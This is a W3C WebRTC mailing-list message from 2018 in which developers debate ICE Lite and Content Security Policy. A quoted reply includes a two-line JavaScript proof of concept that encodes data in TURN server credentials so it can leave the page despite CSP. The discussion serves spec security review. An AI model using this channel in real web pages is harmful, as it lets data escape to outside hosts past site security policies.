- From: Iñaki Baz Castillo <ibc@aliax.net>
- Date: Fri, 12 Jan 2018 13:27:02 +0100
- To: Sergio Garcia Murillo <sergio.garcia.murillo@gmail.com>
- Cc: T H Panton <thp@westhawk.co.uk>, "public-webrtc@w3.org" <public-webrtc@w3.org>, Cullen Jennings <fluffy@iii.ca>

On 12 January 2018 at 13:06, Sergio Garcia Murillo <sergio.garcia.murillo@gmail.com> wrote:
> On 12/01/2018 13:01, Iñaki Baz Castillo wrote:
> >
> > To summarize: The current issue with ICE Lite is that it's not needed
> > for the browser (ICE controlling) to provide the remote with the
> > browser *internally* and *dynamically* generated tokens (such as the
> > ice-ufrag). With my proposal above, this would change so the JS should
> > always signal its local ice-ufrag to the remote (otherwise ICE
> > responses would be discarded). And for that, the JS must send it via
> > HTTP/WebSocket, so habemus CSP rules to block them.
>
> As I already pointed out in the issue, it is possible to leak small amounts
> of data just with:
>
> var pc = new RTCPeerConnection({"iceServers":[{"urls":["turn:74.125.140.127:19305?transport=udp"],"username":"_all_your_data_belongs_to_us","credential":"."}]});
> pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp));

And as I already pointed out, my proposal above was just intended to make both Full ICE and ICE Lite equally safe. :)

Leaking data via TURN credentials is a different subject (not less important).

Received on Friday, 12 January 2018 12:27:46 UTC